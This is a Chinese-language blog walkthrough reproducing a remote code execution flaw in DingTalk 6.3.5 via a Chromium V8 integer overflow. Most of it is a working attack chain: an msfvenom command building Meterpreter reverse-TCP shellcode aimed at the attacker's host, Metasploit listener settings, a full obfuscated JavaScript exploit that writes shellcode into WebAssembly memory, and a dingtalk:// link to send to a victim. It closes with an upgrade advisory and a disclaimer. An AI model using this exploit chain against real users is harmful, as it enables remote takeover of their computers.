某钉版本6.3.5RCE漏洞复现

Posted 2022-04-01 星球守护者

漏洞名称

某钉钉版本6.3.5RCE

漏洞描述

• 具备获取查看web应用能力，且web站点通过http协议传输。
• 漏洞的利用就是通过HTTP协议进行访问构造的payload，从而达成远程RCE获取目标电脑权限
• 利用了Chromium v8引擎整数溢出漏洞（是V8优化编译器Turbofan在SimplifiedLowering阶段产生的一个整数溢出漏洞），V8是Chromium内核中的javascript引擎，负责对JavaScript代码进行解释优化与执行。

执行命令：

dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true

影响版本

• 版本< 6.3.25-Release.2149108

下载地址

https://www.aliyundrive.com/s/K68iEoCvd46

实验环境及准备

双击exe文件，一路下一步安装。。

漏洞复现

第一步 MSF生成shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=端口 -e x86/culprit -f csharp

第二步 MSF开启监听

use exploit/multi/handler
set LHOST 本地IP地址
set LPORT 8834
set payload windows/meterpreter/reverse_tcp
run

第二步 构造poc

<html><body>
<h1> test </h1>
<script>
var _0x1b17=['KELCi8OxLg==','ZE/CpWvCpDkcPA==','E8Kjw51bQ8O+Klk0w4vCsw==','w5lnw5Ipwr12RsOCw7B/J8OEw4E=','QMOtNcO9w77Dv8OIwp3DmQ7CksOdOA==','X8KgbcK0wqXCuw==','DjfCg8KK','OsO3fsOwwojCq0YpMw==','RMKWBMKHW3PCqcKjTwgMaw==','O8KCw5PCoMOpwo0=','e0rDgMO8wqNndsOM','wphVw6Zhw7wWwrLDg8K1','IibCvsKFwqXCqMKAw6w4NDgs','PcO6Z8O2w4LCp20tMWrDhxMZRSLCmSvDuTjCnk8=','GcOiPsKX','G8K7w6vDpXNGIcOwLnXDu8K9BkI=','w7MXFMKhw78WwpYqwqVVFcKR','GMK/w7vDpnVIJ8Or','ank7Wy4jw44=','HTfCicKbGsKEaysJwqTDux1L','GS3CqsKEwqjCp8KRw5Y=','GcOmcktVwrw=','w50aKsKuwq9cdMO4wpTDqyo5GBQ=','IybCrcKgwrvCpsKGw5w8Pyc5AcOn','NhbCuwM=','wqFcbEfDmMOMw6LCkl9ywqwDwocc','wqfChMOfw4jDjsKzwozCn8Oqwok=','w4tcwrED','cCvCsMOQw7g=','w6pdw4k=','wqJyw4vCmMO1wrTCj8OSwqnDnSY=','WsKcBA==','wrV8w4vCjcOlwrDDgcKXwqTDlQ==','XsKWD8KeWA==','H8O+KcKHHGPDiUQ=','w73Ci8OFw60=','Wy7Csg==','e0TDocOvwrR6IsKLQArDsw==','AzvCjQIS','VMOxw6/Ciw==','fEDDp8OdwrhgbMKYGw==','PCzCvg==','w5QHwrPDlGRLNQHDpHwqa8OJR3hiwpwyMBJzJR8=','ZMO8ecOcd8Oow7M6wq1O','w417wqvDl3BuwooiwrnCpDBZwoNw','fHtRGA==','Y24s','w4VWwrsdKQ8=','HsKCOC4RwrQ=','w4AJwrLDi05SLxfDtEI0esODaA==','L2kiFG0=','H8O+I8KdBmc=','w6RcwrEPMQI=','FTvDq8O+w7Ucax4=','FsKfJS4Rwrky','wpBAw5zCjMO1','HsO+w4PDgsKUWw==','EcKxwoXDjcOLCQ==','PkrCncOEOMOww7fCrlDCgMOJesOdAQ==','F8K+w49bSQ==','w4dew5rDmMKg','wp52wrbCpzM=','wqIjw4xDwqA=','cMKIw5vCncKdJV/CoMK7RA==','CiTCnsKdC8KV','fXtHE8ObSBZqwp5G','Fjd1EMOqw57CgcOd','ZsOje8OLbMO8w4Q3wqAQwqU=','C8Kxw63Dh3RZIcO6Pj4=','w4rDj8O/','ZU/Ctg==','BcKyw55TcsO8HF8+w7jCtsKtEgo7w5LCigQ8','w4ZdwrkVPAM='];(function(_0x4285cf,_0x1b1736)var _0x1368bb=function(_0x5a17b5)while(--_0x5a17b5)_0x4285cf['push'](_0x4285cf['shift']());;_0x1368bb(++_0x1b1736);(_0x1b17,0x17b));var _0x1368=function(_0x4285cf,_0x1b1736)_0x4285cf=_0x4285cf-0x0;var _0x1368bb=_0x1b17[_0x4285cf];if(_0x1368['kUYGYC']===undefined)(function()var _0x270725=function()var _0x2929b1;try_0x2929b1=Function('return\\x20(function()\\x20'+'.constructor(\\x22return\\x20this\\x22)(\\x20)'+');')();catch(_0x1b9f87)_0x2929b1=window;return _0x2929b1;;var _0x1971fd=_0x270725();var _0x3ad59d='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x1971fd['atob']||(_0x1971fd['atob']=function(_0x332690)var _0x352a1c=String(_0x332690)['replace'](/=+$/,'');var _0x194774='';for(var _0x5d479b=0x0,_0xde7a28,_0x1ef172,_0x26c98e=0x0;_0x1ef172=_0x352a1c['charAt'](_0x26c98e++);~_0x1ef172&&(_0xde7a28=_0x5d479b%0x4?_0xde7a28*0x40+_0x1ef172:_0x1ef172,_0x5d479b++%0x4)?_0x194774+=String['fromCharCode'](0xff&_0xde7a28>>(-0x2*_0x5d479b&0x6)):0x0)_0x1ef172=_0x3ad59d['indexOf'](_0x1ef172);return _0x194774;);());var _0xa07d5c=function(_0x5c13fe,_0x1ca04c)var _0x48ea63=[],_0x8f6b18=0x0,_0x30c8e4,_0xb17e6='',_0x53b898='';_0x5c13fe=atob(_0x5c13fe);for(var _0x52b8af=0x0,_0x1cd1ff=_0x5c13fe['length'];_0x52b8af<_0x1cd1ff;_0x52b8af++)_0x53b898+='%'+('00'+_0x5c13fe['charCodeAt'](_0x52b8af)['toString'](0x10))['slice'](-0x2);_0x5c13fe=decodeURIComponent(_0x53b898);var _0x49825d;for(_0x49825d=0x0;_0x49825d<0x100;_0x49825d++)_0x48ea63[_0x49825d]=_0x49825d;for(_0x49825d=0x0;_0x49825d<0x100;_0x49825d++)_0x8f6b18=(_0x8f6b18+_0x48ea63[_0x49825d]+_0x1ca04c['charCodeAt'](_0x49825d%_0x1ca04c['length']))%0x100;_0x30c8e4=_0x48ea63[_0x49825d];_0x48ea63[_0x49825d]=_0x48ea63[_0x8f6b18];_0x48ea63[_0x8f6b18]=_0x30c8e4;_0x49825d=0x0;_0x8f6b18=0x0;for(var _0x17f739=0x0;_0x17f739<_0x5c13fe['length'];_0x17f739++)_0x49825d=(_0x49825d+0x1)%0x100;_0x8f6b18=(_0x8f6b18+_0x48ea63[_0x49825d])%0x100;_0x30c8e4=_0x48ea63[_0x49825d];_0x48ea63[_0x49825d]=_0x48ea63[_0x8f6b18];_0x48ea63[_0x8f6b18]=_0x30c8e4;_0xb17e6+=String['fromCharCode'](_0x5c13fe['charCodeAt'](_0x17f739)^_0x48ea63[(_0x48ea63[_0x49825d]+_0x48ea63[_0x8f6b18])%0x100]);return _0xb17e6;;_0x1368['SGqjCq']=_0xa07d5c;_0x1368['PalevQ']=;_0x1368['kUYGYC']=!![];var _0x5a17b5=_0x1368['PalevQ'][_0x4285cf];if(_0x5a17b5===undefined)if(_0x1368['FXcKZO']===undefined)_0x1368['FXcKZO']=!![];_0x1368bb=_0x1368['SGqjCq'](_0x1368bb,_0x1b1736);_0x1368['PalevQ'][_0x4285cf]=_0x1368bb;else_0x1368bb=_0x5a17b5;return _0x1368bb;;const max_size=0x2710;const buf=new ArrayBuffer(0x8);const f64=new Float64Array(buf);const u32=new Uint32Array(buf);function f2i(_0x5ba462)f64[0x0]=_0x5ba462;let _0x3b54a5=Array['from'](u32);return _0x3b54a5[0x1]*0x100000000+_0x3b54a5[0x0];function i2f(_0x2f58b4)let _0x8b3c4c=[];_0x8b3c4c[0x0]=parseInt(_0x2f58b4%0x100000000);_0x8b3c4c[0x1]=parseInt((_0x2f58b4-_0x8b3c4c[0x0])/0x100000000);u32[_0x1368('0x38','XQdw')](_0x8b3c4c);return f64[0x0];function d2u(_0x9ff56e)f64[0x0]=_0x9ff56e;let _0x47fd50=Array[_0x1368('0xa','7rtu')](u32);return _0x47fd50;function u2d(_0x535342,_0x2feac9)u32[0x0]=_0x535342;u32[0x1]=_0x2feac9;return f64[0x0];function print(_0x510c7e)document[_0x1368('0x29','1027')](_0x1368('0x16','pndm')+_0x510c7e+_0x1368('0x19','@XkD'));function hex(_0x2abe47)return _0x2abe47[_0x1368('0x45','Ob1V')](0x10)[_0x1368('0x3','@XkD')](0x10,'0');function success_value(_0x140a70,_0x2c5308)console[_0x1368('0x11','THAJ')](_0x1368('0x15','ki5k')+_0x140a70+hex(_0x2c5308));function wasm_func()var _0x1ab208='env':'puts':function _0x36676a(_0x4b8a69)console[_0x1368('0x1b','*I%3')](_0x4b8a69);;var _0x364582=new Uint8Array([0x0,0x61,0x73,0x6d,0x1,0x0,0x0,0x0,0x1,0x89,0x80,0x80,0x80,0x0,0x2,0x60,0x1,0x7f,0x1,0x7f,0x60,0x0,0x0,0x2,0x8c,0x80,0x80,0x80,0x0,0x1,0x3,0x65,0x6e,0x76,0x4,0x70,0x75,0x74,0x73,0x0,0x0,0x3,0x82,0x80,0x80,0x80,0x0,0x1,0x1,0x4,0x84,0x80,0x80,0x80,0x0,0x1,0x70,0x0,0x0,0x5,0x83,0x80,0x80,0x80,0x0,0x1,0x0,0x1,0x6,0x81,0x80,0x80,0x80,0x0,0x0,0x7,0x92,0x80,0x80,0x80,0x0,0x2,0x6,0x6d,0x65,0x6d,0x6f,0x72,0x79,0x2,0x0,0x5,0x68,0x65,0x6c,0x6c,0x6f,0x0,0x1,0xa,0x8d,0x80,0x80,0x80,0x0,0x1,0x87,0x80,0x80,0x80,0x0,0x0,0x41,0x10,0x10,0x0,0x1a,0xb,0xb,0x92,0x80,0x80,0x80,0x0,0x1,0x0,0x41,0x10,0xb,0xc,0x48,0x65,0x6c,0x6c,0x6f,0x20,0x57,0x6f,0x72,0x6c,0x64,0x0]);let _0x17d97a=new WebAssembly[(_0x1368('0x6','*I%3'))](new WebAssembly[(_0x1368('0x26','h0rH'))](_0x364582),_0x1ab208);let _0x4137b4=new Uint8Array(_0x17d97a[_0x1368('0x28','U7m4')][_0x1368('0x22','U7m4')][_0x1368('0x2a','CQJJ')]);return _0x17d97a[_0x1368('0x4','qxzt')][_0x1368('0x13','THAJ')];func=wasm_func();function gc()for(let _0x636073=0x0;_0x636073<0x10;_0x636073++)new Array(0x1000000);function debug()for(let _0x1aae5c=0x0;_0x1aae5c<0x10000;_0x1aae5c++)for(let _0x206767=0x0;_0x206767<0x20000;_0x206767++)var _0x4e0be5=_0x4e0be5+_0x1aae5c+_0x206767;global_object=;setPropertyViaEmbed=(_0x704953,_0xabb024,_0x54136d)=>const _0x57fb88=document[_0x1368('0x5','qlp^')](_0x1368('0x3b','e8CW'));_0x57fb88[_0x1368('0x3a','h0rH')]=_0x54136d;_0x57fb88['type']=_0x1368('0x46','E5A6');Object['setPrototypeOf'](global_object,_0x57fb88);document[_0x1368('0x1f','4nv[')][_0x1368('0x35','ow9l')](_0x57fb88);_0x704953[_0x1368('0x23','p]KF')]=_0xabb024;_0x57fb88[_0x1368('0x25','QvKY')]();;createCorruptedPair=(_0x16735d,_0x65366a)=>const _0x5a7565='__proto__':global_object;_0x5a7565[_0x1368('0x47','*I%3')]=0x1;setPropertyViaEmbed(_0x5a7565,_0x65366a,()=>Object[_0x1368('0x2c','e8CW')](global_object,null);_0x5a7565[_0x1368('0x8','Ub)S')]=_0x16735d;);const _0x2dc8d4='__proto__':global_object;_0x2dc8d4[_0x1368('0x43','THAJ')]=0x1;setPropertyViaEmbed(_0x2dc8d4,_0x65366a,()=>Object[_0x1368('0x1','@XkD')](global_object,null);_0x2dc8d4[_0x1368('0xb','*j!$')]=_0x16735d;_0x5a7565[_0x1368('0x2','5I39')]=1.1;);return[_0x5a7565,_0x2dc8d4];;const array=[5.5,1.1];array['prop']=0x1;const test1=new BigUint64Array(0x2);var oob_array=[1.1,2.2,3.3];obj_array='m':0x539,'target':gc;ab=new ArrayBuffer(0x1337);gc();gc();gc();var test=[oob_array,oob_array,oob_array,oob_array,oob_array];test[_0x1368('0x41','qlp^')]=0x1;const [object_1,object_2]=createCorruptedPair(array,test);jit=(_0x166e60,_0x539576,_0x1ae253)=>return _0x166e60['corrupted_prop'][_0x539576];;for(var i=0x0;i<0x10000;++i)jit(object_1,0x0);var leak=jit(object_2,0x0);elem=d2u(leak)[0x0];print('0x'+hex(elem));const num=u2d(elem+0x4,elem+0x4);const num2=u2d(elem,elem);proto2=;setPropertyViaEmbed2=(_0x3c4ce8,_0x5b3f78,_0x570b6e)=>const _0x1411bc=document[_0x1368('0x3e','NbDf')](_0x1368('0x2d','54b8'));_0x1411bc[_0x1368('0x44','MqJl')]=_0x570b6e;_0x1411bc[_0x1368('0x0','QvKY')]=_0x1368('0x42','Xp#V');Object[_0x1368('0x1e','djTM')](proto2,_0x1411bc);document[_0x1368('0xd','h0rH')][_0x1368('0x3d','54b8')](_0x1411bc);_0x3c4ce8[_0x1368('0x33','4nv[')]=_0x5b3f78;_0x1411bc['remove']();;createCorruptedPair2=(_0x31208b,_0x4b08b5)=>const _0x2fdefd='__proto__':proto2;_0x2fdefd[_0x1368('0x27','pndm')]=0x1;setPropertyViaEmbed2(_0x2fdefd,_0x4b08b5,()=>Object['setPrototypeOf'](proto2,null);_0x2fdefd[_0x1368('0x36','@XkD')]=_0x31208b;);const _0x5a6d27='__proto__':proto2;_0x5a6d27[_0x1368('0x3c','XQdw')]=0x1;setPropertyViaEmbed2(_0x5a6d27,_0x4b08b5,()=>Object[_0x1368('0x9','*I%3')](proto2,null);_0x5a6d27[_0x1368('0xc','eHuP')]=_0x31208b;_0x2fdefd[_0x1368('0x14','QvKY')]=1.1;);return[_0x2fdefd,_0x5a6d27];;const [object_3,object_4]=createCorruptedPair2(array,num2);jit22=(_0x15b278,_0x32c377)=>_0x15b278[_0x1368('0x31','*clI')][_0x32c377]=num2;_0x15b278[_0x1368('0x12','1#r2')][_0x32c377+0x1]=1.1;return _0x15b278[_0x1368('0x1d','ow9l')][_0x32c377];;for(var i=0x0;i<0x100000;++i)jit22(object_3,0x0);var leak2=jit22(object_4,0x0);var object_idx=undefined;var object_idx_flag=undefined;for(let i=0x0;i<max_size;i++)if(d2u(oob_array[i])[0x0]==0xa72)print(_0x1368('0x2b','CQJJ')+i+_0x1368('0x18','O6t]'));print('target:\\x20i:\\x20'+i+'\\x20hi\\x201');object_idx=i;object_idx_flag=0x1;break;if(d2u(oob_array[i])[0x1]==0xa72)print(_0x1368('0x7','3nrn')+i+_0x1368('0x2f','djTM'));print('target:\\x20i:\\x20'+(i+0x1)+_0x1368('0x18','O6t]'));object_idx=i+0x1;object_idx_flag=0x0;break;function addrof(_0x71fee0)obj_array[_0x1368('0x32','qlp^')]=_0x71fee0;return d2u(oob_array[object_idx])[object_idx_flag]-0x1;var ab_addr=addrof(ab);print('test:\\x20'+hex(ab_addr));var bk_idx=undefined;var bk_idx_flag=undefined;let flag=0x0;for(let i=0x0;i<max_size;i++)if(d2u(oob_array[i])[0x0]==0x1337)console[_0x1368('0x20','qxzt')](_0x1368('0x40','M*(X')+i+_0x1368('0x2e','1027'));console[_0x1368('0x37','ki5k')](_0x1368('0x17','Ob1V')+i+_0x1368('0xe','*I%3'));bk_idx=i;bk_idx_flag=0x1;break;if(d2u(oob_array[i])[0x1]==0x1337)console['log']('m:\\x20i:\\x20'+i+_0x1368('0x24','qxzt'));console[_0x1368('0xf','0$K8')](_0x1368('0x10','1#r2')+(i+0x1)+_0x1368('0x30','roPh'));bk_idx=i+0x1;bk_idx_flag=0x0;break;var dv=new DataView(ab);var bk_addr=d2u(oob_array[bk_idx]);function get_32(_0x251c0e)var _0x524bc3=d2u(oob_array[bk_idx]);if(bk_idx_flag==0x0)oob_array[bk_idx]=u2d(_0x251c0e,_0x524bc3[0x1]);elseoob_array[bk_idx]=u2d(_0x524bc3[0x0],_0x251c0e);return dv['getUint32'](0x0,!![]);function set_32(_0x2f8305,_0x1a3c26)var _0xd022f7=d2u(oob_array[bk_idx]);if(bk_idx_flag==0x0)oob_array[bk_idx]=u2d(_0x2f8305,_0xd022f7[0x1]);elseoob_array[bk_idx]=u2d(_0xd022f7[0x0],_0x2f8305);dv[_0x1368('0x1a','Ob1V')](0x0,_0x1a3c26,!![]);function set_8(_0x5d0cd7,_0x575a5c)var _0x50493b=d2u(oob_array[bk_idx]);if(bk_idx_flag==0x0)oob_array[bk_idx]=u2d(_0x5d0cd7,_0x50493b[0x1]);elseoob_array[bk_idx]=u2d(_0x50493b[0x0],_0x5d0cd7);dv[_0x1368('0x34','tZnn')](0x0,_0x575a5c,!![]);var wasm_func_addr=addrof(func);print(_0x1368('0x39','54b8')+hex(wasm_func_addr));var shared_info_addr=get_32(wasm_func_addr+0xc)-0x1;print(_0x1368('0x48','Xp#V')+hex(shared_info_addr));var export_function_data_addr=get_32(shared_info_addr+0x4)-0x1;print('export_function_data_addr\\x20is:\\x20'+hex(export_function_data_addr));var wasm_instance_addr=get_32(export_function_data_addr+0x8)-0x1;print(_0x1368('0x1c','p]KF')+hex(wasm_instance_addr));var rwx_addr=get_32(wasm_instance_addr+0x40);print(_0x1368('0x3f','M*(X')+hex(rwx_addr));var shellcode=new Uint8Array([替换成第一步生成的]);for(let i=0x0;i<shellcode[_0x1368('0x21','h0rH')];i++)set_8(rwx_addr+i,shellcode[i]);func();
</script>
</body>
</html>


需要替换的位置为
var shellcode=new Uint8Array()
以后的部分

第三步开启web服务，并上传poc文件，构造poc
python -m http.server 端口

第四步 给受害着发送poc，并且受害着点击，触发漏洞
dingtalk://dingtalkclient/page/link?url=攻击IP/test.html&pc_slide=true

由于版本限制目前无法登录
第五步 MSF查看返回的shell信息

修复建议

升级至安全版本（钉钉电脑版>= 6.3.25）：
检查钉钉版本(左上角名字->关于钉钉)是否>=6.3.25，并打开自动更新（默认打开）

免责声明

本文档供学习，请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责！